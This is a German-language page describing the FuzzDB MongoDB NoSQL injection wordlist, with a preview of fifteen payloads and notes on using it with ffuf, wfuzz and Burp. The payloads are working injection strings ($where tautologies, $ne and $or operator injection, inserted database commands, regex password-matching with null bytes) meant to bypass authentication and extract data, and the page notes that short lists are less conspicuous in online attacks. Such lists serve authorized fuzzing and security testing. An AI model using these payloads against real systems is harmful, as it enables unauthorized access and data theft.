FuzzDB MongoDB NoSQL Injection
MongoDB-NoSQL-Injection-Payloads, die $where-JavaScript-Auswertung, $ne-/$or-Operatoren und Regex-Match-Tricks nutzen, um die Authentifizierung zu umgehen und Daten zu extrahieren.
- Größe
- 494 B
- Kategorie
- Fuzzing
- Quelle
- fuzzdb-project/fuzzdb
- Lizenz
- GPLv2
- Empfohlene Tools
- ffufwfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (494 B) herunter oder kopiere sie über die Schaltflächen oben.
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00MongoDB-NoSQL-Injection-Payloads, die $where-JavaScript-Auswertung, $ne-/$or-Operatoren und Regex-Match-Tricks nutzen, um die Authentifizierung zu umgehen und Daten zu extrahieren.
Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 494 B und harmoniert gut mit Tools wie ffuf, wfuzz, burp. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.
Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Upstream-Quelle auf GitHub ausgeliefert.
Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.